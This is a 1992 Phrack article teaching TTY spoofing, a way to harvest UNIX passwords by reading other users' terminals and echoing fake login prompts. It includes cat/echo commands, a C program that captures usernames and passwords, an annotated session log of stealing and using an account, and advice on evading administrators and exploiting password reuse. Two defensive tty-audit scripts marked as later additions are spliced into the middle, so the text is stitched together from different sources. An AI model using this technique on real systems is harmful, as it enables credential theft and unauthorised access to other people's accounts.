                                ==Phrack Inc.==

                   Volume Four, Issue Forty-One, File 8 of 13

                         ++++++++++++++++++++++++++++
                         +++++++              +++++++
                         +++++++ TTY SPOOFING +++++++
                         +++++++              +++++++
                         ++++++       BY       ++++++
                         +++++                  +++++
                         +++      VaxBuster      +++
                         ++                        ++
                         ++++++++++++++++++++++++++++

                                 July 16, 1992

Please note that this file is ONLY to be distributed as part of Phrack,
and will NOT be distributed to any other person or magazine for release.

More detailed instructions have been provided so that the novice hacker is
able to understand them; therefore, all experienced hackers should be able to
breeze right through this without having to worry about the specific command
syntax provided.

On UNIX systems, there are many ways to obtain account names and passwords.
Some hackers prefer to swipe the password file and run programs like Crack and
Killer Cracker on them in order to get account names and passwords. Others
rely on bugs or holes in the system in order to gain root access. Both these
methods work, but what do you do if your password file is shadowed (and it is
NOT a yellow pages file!)? And what do you do if all the holes have been
patched over from years of previous hackers abusing them? Well, I happen to
have found a system where all this is true. I have even allowed hackers to use
one of my accounts to try to gain root privs, and of the 10 or so that have
tried, they have all failed. My only recourse was to find SOME other way to
get accounts on the system to maintain MY security.

TTY spoofing is often looked at as being lame, and some don't even consider
it a "hacking technique." People usually completely overlook it, and many
others don't even know about it, or know HOW to do it. I suppose I should
start out by defining the term. TTY spoofing means installing a Trojan horse
type program that sits and watches one tty (or several) and waits for a user
to log in. Instead of getting the normal system prompt, the user gets the
"login:" prompt echoed by the program YOU installed; after they type in their
username, it prompts them for "<username> password:" and boom, you have a new
account. This can be done by a program or, in many cases, manually.

Of all the people I know, 90 percent of them scream at me saying that this
is impossible because their system doesn't allow read/write access to the tty.
When I make references to tty, I mean the physical device filename, /dev/ttyxx,
where xx is numeric, alphabetic, or alphanumeric (e.g., 03, pa, p4 are all
valid). Of all the systems I've been on, I've never seen one that doesn't
allow reading and writing a tty that is still sitting at the LOGIN process.
See, the system doesn't change the tty to owner-only r/w until AFTER THE
USERNAME AND PASSWORD HAVE BEEN VERIFIED. Console, or ttyco, is an exception
where the perms are ALWAYS -rw-------.

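The point above is the whole root cause: the technique only works while a terminal device is readable or writable by users other than its owner. The following audit script is an added example written for this edition, not code from VaxBuster's article or from any project it mentions; it classifies the permission bits on terminal device nodes and reports the ones that would allow keystroke capture or prompt injection. The device globs are an assumption about a typical /dev layout (BSD-style ttyNN/ttypN names plus Linux /dev/pts).

```sh
#!/bin/sh
# Added audit script (not from VaxBuster's article or any project it names).
# The technique in the text works only while a terminal device can be read
# (keystrokes captured) or written (fake prompt injected) by users other
# than its owner, i.e. before login tightens the mode. This script reports
# exactly those bits. The device globs below are an assumption about a
# typical /dev layout (BSD-style ttyNN/ttypN names plus Linux /dev/pts).

# tty_exposure MODE
#   MODE is the 10-character permission field from `ls -l`, e.g. crw--w----.
#   Prints the findings "group-read", "other-read", "other-write" (space
#   separated, in that order), or "ok" when none apply. Group write alone is
#   deliberately not a finding: with a dedicated tty group it is the normal
#   `mesg y` state that setgid write/wall rely on.
tty_exposure() {
    mode=$1
    group_bits=$(printf '%s\n' "$mode" | cut -c5-7)
    other_bits=$(printf '%s\n' "$mode" | cut -c8-10)
    findings=
    case $group_bits in r*)  findings="$findings group-read"  ;; esac
    case $other_bits in r*)  findings="$findings other-read"  ;; esac
    case $other_bits in ?w*) findings="$findings other-write" ;; esac
    if [ -z "$findings" ]; then
        printf 'ok\n'
    else
        printf '%s\n' "${findings# }"
    fi
}

# scan_ttys
#   Walks the terminal device nodes and prints "DEVICE OWNER MODE FINDINGS"
#   for every node tty_exposure does not rate "ok". Returns 1 if anything
#   was reported, 0 otherwise, so a cron job can alert on the exit status.
scan_ttys() {
    exposed=0
    for dev in /dev/tty[0-9]* /dev/tty[pqrstuvwxyz]? /dev/pts/[0-9]* /dev/console; do
        [ -c "$dev" ] || continue            # unmatched glob or not a device
        line=$(ls -ld "$dev" 2>/dev/null) || continue
        mode=$(printf '%s\n' "$line" | cut -c1-10)
        owner=$(printf '%s\n' "$line" | awk '{ print $3 }')
        result=$(tty_exposure "$mode")
        if [ "$result" != ok ]; then
            printf '%s %s %s %s\n' "$dev" "$owner" "$mode" "$result"
            exposed=1
        fi
    done
    return "$exposed"
}

# Run the live scan only when asked, so the file can also be sourced for
# its functions:   sh tty_audit.sh --scan
if [ "${1-}" = --scan ]; then
    scan_ttys
fi
```

A tty reported as other-read is the case the article exploits (anyone can `cat` it); other-write is what lets a fake "login:" be echoed onto it. On a system with a dedicated tty group, a clean run prints nothing and exits 0; any output means a terminal is open to users who do not own it.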
Now that you know WHAT tty spoofing is and the general idea behind WHY it
works, I'll start to tell you the many ways it can be done.

In order to tty spoof, you MUST have at least ONE valid account on the
system. You can obtain the account via a little social engineering, or you
could try a /who *sitename in the IRC to get nicknames and use their username
and try to hack out the password. Try looking for users in #hottub and other
st00pid channels because they are the ones who would tend to have the easy
passwords. Or use any other method that you can think of to obtain an account.

Once you have an account, the rest is the easy part. Simply create a script
in vi or emacs that redirects input from UNUSED tty's to cat. Since you are
cat's standard output, everything coming FROM the monitored tty will come to
your screen. You probably want to watch about 10 or 15 terminals. An example
script would be:

cat </dev/tty01&
cat </dev/tty02&
cat </dev/ttypa&
cat </dev/ttyp1&

Then you want to just run your script with source. Once a user walks up to
a terminal (or remotely logs in via telnet, etc.), they will try to press
return and attempt to get a login prompt. Many users will also type their
username, thinking that the system is just waiting for it. Make sure you write
down the username. After a while, they will probably start pressing control
characters, like control-d or z or whatever. Here's the problem: when CAT
encounters the ^D, it thinks that it is receiving an EOF in the file and it
thinks its job is done. You'll get something to the effect of:

[2]    Exit DONE    cat </dev/tty01

or

[2]    Exit 1    cat:i/o error    cat </dev/tty01

You want to IMMEDIATELY (if not sooner) "recat" that terminal. Once you get
that DONE signal, you now know WHAT terminal is active. You want to then type
something to the effect of 'echo -n "login:" >/dev/tty01&'. The & is important
because if the user decided to switch terminals, echo could lock up and freeze
your control on the account. If after about 10 seconds echo doesn't come back
as:

[5]    Exit DONE    echo -n login: >/dev/tty01

KILL the process. When you ran the echo command, the shell gave you a
processid. Just type KILL processid. If the done echo line DOES come back,
that means that it was successfully printed on the user's screen. He will then
type in his username. WRITE THIS DOWN. If you are ever in doubt that the word
on your screen is a username, type 'grep word /etc/passwd' and if a line comes
up, you know it's valid. If grep doesn't return anything, still keep it
because it might be a password. Then wait about 2 seconds, and type
'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
lockage. If that command doesn't come back in about 10 seconds, kill the
process off and you can assume that you lost the user (e.g. he moved to another
terminal). If the done echo line DOES come back, then in about 2 seconds, you
SHOULD see his password come up. If you do, write it down, and boom, you have
a new account.

This may seem like a time consuming process and a lot of work, but
considering that if you have macros with the "cat </dev/tty" command and the
echo -n commands preset, it will be a breeze. Okay - so you say to yourself,
"I'm a lazy shit, and just want passwords to be handed to me on a silver
platter." With a little bit of work, you can do that! Below are a few lines of
C source code that can be used to automate this process. Anyone who knows C
should be able to put something together in no time.

#include <stdio.h>

FILE *fp, *fp2;
char username[10], password[10];

int main(void)
{
    /* Open the target tty once for reading and once for writing. */
    fp = fopen("/dev/ttyp1", "r");
    fp2 = fopen("/dev/ttyp1", "w");
    if (fp == NULL || fp2 == NULL) {
        perror("/dev/ttyp1");
        return 1;
    }

    fprintf(fp2, "login:");
    fflush(fp2);                    /* no newline, so push the prompt out now */
    fscanf(fp, "%9s", username);    /* arrays decay to pointers: no & here */

    /* Put delay commands in here */

    fprintf(fp2, "%s password:", username);
    fflush(fp2);
    fscanf(fp, "%9s", password);    /* %9s keeps the 10-byte buffers safe */

    printf("Your new account info is %s, with password %s.\n", username,
           password);
    return 0;
}

This is a VERY basic setup. One could fairly easily have the program take
arguments from the command line, like a range of tty's, and have the output
sent to a file.

Below is an actual session of manual tty spoofing. The usernames and
passwords HAVE been changed because they will probably be active when you read
this. Some c/r's and l/f's have been cut to save space. Please notice that the
time between the startup and getting a new account is only seven minutes.
Unlike Crack and similar programs, this technique does not limit the hacked
passwords to dictionary derivatives.

source mycats                         ; This file contains cats
                                      ; for terminals tty03 - tty10
[1] 29377
/dev/tty03: Permission denied         ; All this means is that someone is
                                      ; logged in and has their mesg set to
                                      ; NO. Ignore it.

[1]    Exit 1    cat < /dev/tty03
[2] 29378
[3] 29379
/dev/tty06: Permission denied
/dev/tty05: Permission denied
[4]    Exit 1    cat < /dev/tty06
[3]    Exit 1    cat < /dev/tty05
/dev/tty07: Permission denied
[3]    Exit 1    cat < /dev/tty07
/dev/tty08: Permission denied
[3]    Exit 1    cat < /dev/tty08
[2]  + Stopped (tty input)  cat < /dev/tty04   ; This was the terminal I was
                                               ; on - it's automatically
                                               ; aborted...
[3] 29383
<5:34pm><~> /dev/tty09: Permission denied
[3]    Exit 1    cat < /dev/tty09
<5:34pm><~> source mycats2            ; This one contains 34 - 43

[3] 29393
[4] 29394
[5] 29395
[6] 29396
[7] 29397
[8] 29398
[9] 29399
/dev/tty36: Permission denied
/dev/tty37: Permission denied
/dev/tty38: Permission denied
/dev/tty39: Permission denied
/dev/tty40: Permission denied
/dev/tty34: Permission denied
/dev/tty35: Permission denied

[9]    Exit 1    cat < /dev/tty40
[8]    Exit 1    cat < /dev/tty39
[7]    Exit 1    cat < /dev/tty38
[6]    Exit 1    cat < /dev/tty37
[5]    Exit 1    cat < /dev/tty36
[4]    Exit 1    cat < /dev/tty35
[3]    Exit 1    cat < /dev/tty34

[1] 29400
[3] 29401
[4] 29402

<5:34pm><~> /dev/tty41: Permission denied

[1]    Exit 1    cat < /dev/tty41
/dev/tty43: Permission denied
[4]    Exit 1    cat < /dev/tty43
/dev/tty42: Permission denied
[3]    Exit 1    cat < /dev/tty42

<5:34pm><~> source mycats3            ; This contains p1-pa

[3] 29404
[4] 29405
[5] 29406
[6] 29407
[7] 29408
/dev/ttyp1: Permission denied
/dev/ttyp3: Permission denied
/dev/ttyp5: Permission denied
/dev/ttyp6: Permission denied

[8]    Exit 1    cat < /dev/ttyp6
[7]    Exit 1    cat < /dev/ttyp5
[5]    Exit 1    cat < /dev/ttyp3
[3]    Exit 1    cat < /dev/ttyp1
[7] 29410
[8] 29411
[9] 29412
[1] 29413

<5:34pm><~> /dev/ttyp7: Permission denied

[7]    Exit 1    cat < /dev/ttyp7
/dev/ttypa: Permission denied
[1]    Exit 1    cat < /dev/ttypa

<5:34pm><~> source mycats4            ; Last one is q0-qa

[1] 29426
[3] 29427
[5] 29428
[7] 29429
[10] 29430
[11] 29431
/dev/ttyq5: Permission denied

[10]   Exit 1    cat < /dev/ttyq5
[12] 29432
[10] 29433
[13] 29434
[14] 29435
<5:34pm><~> who

<5:34pm><~> nnnnnnnnrlogin unx        ; He thought he didn't type it right.
pigsnort                              ; Important! Write down ALL non-
                                      ; system sent messages!
<5:35pm><~>
grep pigsnort /etc/passwd             ; Check with grep to see if it's an
                                      ; account.

<5:35pm><~>                           ; Didn't return anything - must be
                                      ; a password!

nnnpptst8                             ; Sure looks like an account name to
nnnnn=====                            ; me! Write it down!

ls

[8]    Done      cat < /dev/ttyp8     ; Asshole pressed control-d.
                                      ; 'recat' the terminal!

<5:36pm><~> cat </dev/ttyp8&          ; This is the 'recat.'

[8] 29459
<5:36pm><~> cat: read error: I/O error    ; Asshole is now trying all
                                          ; sorts of control characters
                                          ; sending UNIX into a fit.
[4]    Exit 1    cat < /dev/ttyp2

<5:36pm><~> cat </dev/ttyp2&          ; 'recat' it!

[4] 29465
<5:36pm><~>

<5:36pm><~>

[6]    Done      cat < /dev/ttyp4     ; Someone had to press the
                                      ; character, so this is active.

<5:36pm><~> cat </dev/ttyp4&          ; 'recat' the ctrl-d.

[6] 29468
<5:36pm><~> echo -n "login:" >/dev/ttyble1   ; Try echo'ing a fake login
cat: read error: I/O error                   ; to the active terminal.

[6]    Exit 1    cat < /dev/ttyp4
poop4d                                ; Here goes another password.
p4                                    ; Couldn't find the matching
&                                     ; account.

[6] 29470
<5:37pm><~> cat: read error: I/O error

[4]    Exit 1    cat < /dev/ttyp2

<5:37pm><~> cat </dev/ttyp2&

[4] 29489
<5:37pm><~> echo -n "login:" >/dev/ttyp2&    ; Try echo'ing a fake login
                                             ; prompt again.
[15] 29490
<5:37pm><~> kill 29490                ; Login prompt didn't return
                                      ; within a few seconds so we
                                      ; kill it.

[15]   Terminated  echo -n login: > /dev/ttyp2
<5:37pm><~> cat </dev/tty
echo -n "login:" >/dev/ttyp4&

[15] 29491
<5:38pm><~> kill 29491

<5:38pm><~> grep pptst8 /etc/passwd   ; Make sure it's an account!

pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
<5:38pm><~> grep ble1 /etc/passwd     ; This isn't an account...

<5:39pm><~> grep poop4d /etc/passwd   ; Neither is this - probably
                                      ; a password...

<5:39pm><~> who                       ; See if any of the users we
                                      ; caught fell through an
                                      ; 'uncatted' terminal...

<5:39pm><~> ps -x                     ; View all our processes.
                                      ; DAMN glad that the cat's
  PID TT STAT  TIME COMMAND           ; don't come up in the process
29266 04 S     0:04 -tcsh (tcsh)      ; list!
29378 04 T     0:00 cat
29412 04 I     0:00 -tcsh (tcsh)
29426 04 I     0:00 -tcsh (tcsh)
29427 04 I     0:00 -tcsh (tcsh)
29428 04 I     0:00 -tcsh (tcsh)
29429 04 I     0:00 -tcsh (tcsh)
29431 04 I     0:00 -tcsh (tcsh)
29432 04 I     0:00 -tcsh (tcsh)
29433 04 I     0:00 -tcsh (tcsh)
29434 04 I     0:00 -tcsh (tcsh)
29435 04 I     0:00 -tcsh (tcsh)
29459 04 I     0:00 -tcsh (tcsh)
29470 04 D     0:00 <exiting>
29489 04 I     0:00 -tcsh (tcsh)
29491 04 D     0:00 -tcsh (tcsh)
29547 04 R     0:00 ps -x
<5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29435 29459 29470 29489 289491
                                      ; Kill off all processes.

29470: No such process

[4]    Terminated  cat < /dev/ttyp2
[8]    Terminated  cat < /dev/ttyp8
[14]   Terminated  cat < /dev/ttyqa
[13]   Terminated  cat < /dev/ttyq9
[10]   Terminated  cat < /dev/ttyq8
[12]   Terminated  cat < /dev/ttyq7
[11]   Terminated  cat < /dev/ttyq6
[7]    Terminated  cat < /dev/ttyq4
[5]    Terminated  cat < /dev/ttyq3
[3]    Terminated  cat < /dev/ttyq2
[1]    Terminated  cat < /dev/ttyq1
[9]    Terminated  cat < /dev/ttyp9
[2]    Terminated  cat < /dev/tty04

<5:41pm><~>

[15]   Terminated  echo -n login: > /dev/ttyp4
[6]    Done        echo -n login: > /dev/ttyp4

<5:41pm><~> ps -x

  PID TT STAT  TIME COMMAND
29266 04 S     0:04 -tcsh (tcsh)
29594 04 R     0:00 ps -x
<5:41pm><~> logout

Local -011- Session 1 disconnected from UNIX1

Local> c unx                          ; Notice it's a different
                                      ; system but shares passwords.
Local -010- Session 1 to UNX on node MYUNX established

Welcome to ucuc.edu.

login: ble1                           ; Test out all the accounts
ble1 password: [I tried poop4d]       ; with all the passwords.
Login failed.
login: pptst8
pptst8 password: [I tried poop4d here too.]
Login failed.
login: pptst8
pptst8 password: [I typed pigsnort]
Authenticated via AFS Kerberos.       ; BINGO! We're in!
Checking system rights for <pptst8>... login permitted.
login 1.0(2), Authen
Last login: Fri Jul 17 17:33:30 on tty11

(1) unix $ ls                         ; Let's see what this sucker
                                      ; has...hmm...an IRC user, eh?
Mail Mailbox News bin irc other junk private public
(2) unix $ logout

Local -011- Session 1 disconnected from UNX

A few words of advice: Monitor the tty's when it's the busiest time of the
day, usually about 11am on a university system. Kill all your processes before
you hang up. Those processes that you run will sit on the system and can be
found by sysadmins. Also, they will tie up those tty's that you are
monitoring, which can also cause problems. Point is, you DON'T want to attract
attention to what you're doing. Don't test the accounts you get immediately.
If the victim happens to be doing a 'who' and sees two of himself, he is going
to shit. Wait until later or use a different subsystem that won't show up on
his 'who'.

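The author's own warning that lingering processes "can be found by sysadmins" is the detection angle worth making concrete. In the session above, every cat holds another user's terminal device open while the attacker's controlling terminal is tty04, and the session log shows that a plain `ps -x` does not make that relationship visible. The script below is an added example written for this edition, not code from VaxBuster's article or from any project it names: it classifies each open terminal descriptor by whether it belongs to the process's own controlling terminal, to a device the same uid owns, or to someone else's terminal. The /proc walk, `ps -o tty=` and `stat -c %u` are Linux/procps/GNU assumptions; the classifier and the report function are portable and are exercised by a constructed sample modelled on the session.

```sh
#!/bin/sh
# Added detection helper (not from VaxBuster's article or any project it
# names). The cat processes in the session above hold other users' terminal
# devices open while the attacker's own controlling terminal is a different
# tty. On Linux, /proc exposes exactly that relationship, so an administrator
# can list processes holding a terminal they neither control nor own.
# The /proc walk, `ps -o tty=` and `stat -c %u` are Linux/procps/GNU
# assumptions; classify_fd and report_records are portable and are what the
# constructed sample below exercises.

# classify_fd PID PROC_UID CTTY TARGET TARGET_UID
#   One open file of process PID (running as PROC_UID, controlling terminal
#   CTTY such as "pts/3" or "?" for none). TARGET is the path the descriptor
#   points at, owned by TARGET_UID. Prints one of:
#     ignore      - not a terminal device (or the /dev/tty alias)
#     own-ctty    - the process's own controlling terminal
#     own-device  - another terminal, but one this uid owns (su, screen, ...)
#     suspect     - a terminal owned by someone else that is not its ctty
classify_fd() {
    pid=$1 proc_uid=$2 ctty=$3 target=$4 target_uid=$5
    case $target in
        /dev/tty) printf 'ignore\n'; return 0 ;;
        /dev/tty*|/dev/pts/*) ;;
        *) printf 'ignore\n'; return 0 ;;
    esac
    if [ "/dev/$ctty" = "$target" ]; then
        printf 'own-ctty\n'
    elif [ "$proc_uid" = "$target_uid" ]; then
        printf 'own-device\n'
    else
        printf 'suspect\n'
    fi
}

# report_records
#   Reads "PID PROC_UID CTTY TARGET TARGET_UID" lines on stdin and prints
#   "PID TARGET" for every record classified as suspect.
report_records() {
    while read -r pid uid ctty target tuid; do
        if [ "$(classify_fd "$pid" "$uid" "$ctty" "$target" "$tuid")" = suspect ]; then
            printf '%s %s\n' "$pid" "$target"
        fi
    done
    return 0
}

# collect_records  (Linux only)
#   Emits one record per terminal device open in any process, in the format
#   report_records expects. Run as root to see every process's descriptors.
collect_records() {
    for status in /proc/[0-9]*/status; do
        pid=${status#/proc/}; pid=${pid%/status}
        uid=$(awk '/^Uid:/ { print $2 }' "$status" 2>/dev/null) || continue
        ctty=$(ps -o tty= -p "$pid" 2>/dev/null | tr -d ' ')
        [ -n "$ctty" ] || ctty='?'
        for fd in /proc/"$pid"/fd/*; do
            target=$(readlink "$fd" 2>/dev/null) || continue
            case $target in /dev/tty*|/dev/pts/*) ;; *) continue ;; esac
            tuid=$(stat -c %u "$target" 2>/dev/null) || continue
            printf '%s %s %s %s %s\n' "$pid" "$uid" "$ctty" "$target" "$tuid"
        done
    done
}

# Constructed sample modelled on the session above: the attacker's shell
# (pid 29266) sits on tty04, one of its cats (29378) holds /dev/ttyp8, which
# belongs to a different uid, and a getty (pid 4242, root) owns /dev/tty1.
SAMPLE_RECORDS='29266 1000 tty04 /dev/tty04 1000
29378 1000 tty04 /dev/ttyp8 1042
29459 1000 tty04 /dev/ttyp2 1000
4242 0 ? /dev/tty1 0'

# sample_report: runs the constructed records through the classifier.
sample_report() {
    printf '%s\n' "$SAMPLE_RECORDS" | report_records
}

if [ "${1-}" = --scan ]; then
    collect_records | report_records
else
    sample_report
fi
```

Run with `--scan` as root on a Linux host to report live processes; without arguments it prints the one suspect from the constructed sample, `29378 /dev/ttyp8`. The classifier is deliberately conservative: a terminal the process's own uid owns is not reported, so su and terminal multiplexers do not trip it, while a process reading a terminal that belongs to a different user and is not its controlling tty is precisely the cat the article describes.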
Don't take over accounts. All the real user has to do is call up the office
and tell them that their password was changed. In two seconds, it'll be
changed back, plus the sysadmin will be on the lookout so you're just one step
BEHIND where you started. Once you have someone's account info, kill the cat
that is sucking the terminal so that the user can log in normally. If he
continues not to get ANYTHING, he may go and solicit some "professional" help,
and THEY might know what's going on, so let the sucker log in. Another thing:
with accounts you get.

DO NOT DESTROY ANYTHING in the system, not in their account, and nowhere else
if you get higher privs. Chances are that the person is NOT going to know
someone has obtained their password, and will have NO reason to change it.
Wait until his college term/semester ends and then monitor the file dates. If
after about a month the dates don't change, change the password and do whatever
you want to the account because he's probably done with it.

Oh and one last thing. Once you have a valid account, grep the username and
get the REAL name. Then grep the REAL name and find out all accounts on the
system that the guy owns. Chances are that he is using the same password in
multiple accounts!

Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
for putting out an excellent magazine over the years.

If you need to contact me, try the IRC in #hack and the VMB world. I usually
prefer NOT to be contacted by e-mail, but if you have my address and have an
important question, go for it. I'm willing to help any beginners who need it.

Happy Hacking!

VaxBuster '92